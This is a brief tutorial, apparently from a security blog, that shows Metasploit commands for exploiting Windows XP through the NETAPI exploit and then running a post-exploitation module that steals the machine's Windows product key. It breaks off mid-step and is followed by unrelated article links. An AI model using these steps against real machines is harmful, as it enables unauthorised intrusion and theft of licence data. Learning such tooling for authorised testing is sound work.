As discussed previously, we had successfully exploited a windows machine with Metasploit Framework and created an administrator user in targeted machine. Now in this article, we’ll another exploit which steals the Windows Product Key remotely.
For this methods, run the “NETAPI Exploit” (specially for Windows XP) in background mode by typing “exploit -j” command.
To view all hacked sessions, type “sessions” in same console.
Now we’ll use another exploit which steals the Microsoft Windows Product Key and for this, type “use post/windows/gather/enum_ms_product_keys” in same terminal.
Set the ID value of session which we hacked by typing “set session <ID>”You may also like:
- Mastering Windows Management with WMIC Commands – Top 20 Examples
- The Intricate Process of Designing and Developing Online Casino Slot Games
- Bella Protocol vs. Traditional Banking: A New Era of Financial Services
- How Does Spam Score Affect SEO?
- Top Email Marketing Applications for Effective Campaigns
- Edit and Compile Code with the Best 5 Code Editors
- 50+ Top DevSecOps Tools You Need To Know
- Learn How to Add Proxy and Multiple Accounts in MoreLogin
- Can Jews and Evangelical Christians Co-Exist?
- What Will Be Digital Information Technology in 2023